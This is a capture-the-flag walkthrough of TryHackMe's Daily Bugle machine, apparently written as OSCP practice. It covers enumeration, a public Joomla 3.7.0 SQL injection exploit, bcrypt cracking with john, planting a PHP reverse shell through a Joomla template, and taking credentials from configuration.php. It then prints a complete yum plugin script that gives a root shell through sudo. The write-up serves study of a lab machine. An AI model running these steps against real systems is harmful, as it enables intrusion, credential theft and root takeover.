[Write-up]: Daily Bugle Machine On TryHackMe

Hi everybody,
I’ve started to hack machines in TryHackMe for OSCP exam in this quarantine times and decided to write walkthrough of those machines which hacked successfully. This post is for Daily Bugle’s machine walkthrough.

Let’s Begin :) Note that enumeration is always key :)

Nmap Scanning

As per usual, We will start with nmap scanning for getting information ports. Use following command for get available ports.

1
nmap -sV -sC -T4 <your-machine-ip>

Result of nmap scanning

Nmap Result

The nmap scanning results showing just three ports as open:

  • SSH on port 22 (OpenSSH 7.4)
  • A web server on port 80 (Apache 2.4.6, also Joomla CMS)
  • A mysql on port 3306 (MariaDB)

Currently, We don’t have any important information now. We can start by looking web server. When we go to url (http://your-ip), we see a blogsite by using Joomla engine. If we get more information about website, we can search directories of that site with GoBuster or JoomScan. I prefered to use JoomScan by following command.

JoomScan Scanning

1
joomscan -u http://<your-ip>/

Result of joomscan

JoomScan Result

We see that what joomla version is and joomla’s administrator url. Also, we search exploit using joomla (3.7.0) version number with searchsploit, it shows that 3.7.0 is vulnerable to SQL Injection.

Searchploit Result

Running Joomblah Exploit

When I was searching exploit a little time, I had found it on Github - Exploit for Joomla 3.7.0 (CVE-2017-8917) then run python script.

Result of Joomblah

Joomblah Result

After running script, We have following credentials of user.

  • User name: jonah
  • Password hash: [REDACTED]
  • User rol: super user

Cracking Password

Hashed password starts with $2y$, which means it is a bcrypt hash. We can use john tool which come as installed in Kali to crack password with rockyou list. Following command gives us to his password. It takes a few minutes.

1
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt password_hash

Reverse Shell

Now, we have credentials for Joomla administrator login page (We found with joomscan). Firstly, I tried to connect to machine quickly via ssh (People mostly use same credentials everywhere) but username and password are not valid. I logged in administrator page and investigated panel. After nearly half an hour later, I discovered that We can edit and run php code in protostar template where is in at Extensions -> Templates Menu.

protostar

After learning this trick, I added PentestMonkey’s PHP Reverse Shell code to index.php file then got revere shell successfully via nc.

nc

I did some digging on this machine then came accross configuration.php file in /var/html/www and found current username in home directory.

config

We have second credentials now. It can be tried anywhere.

  • User Name: jjameson
  • Password: [REDACTED]

First question is to what is user flag? (for jjameson)
I tried username and password to ssh connection via following command.

1
ssh jjameson@<your-ip>

User flag is in user.txt file in /home/jjameson

userFlag

Privilege Escalation

After catching user flag, I examined following things for privilege excalation in system.

  • Crontab
  • SUID files
  • sudo -l command

jjameson user uses sudo to run Yum which is the primary tool for getting, installing, deleting, querying, and managing Red Hat Enterprise Linux RPM software packages. After quick search, I found code to become root by running yum at GTFOBins

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

Second question is to what is root flag? (for root)
If we run abow code, we can get root shell. Root flag is in root.txt file in /root/

rootFlag

That’s all, It is pretty machine. See you next blog post :)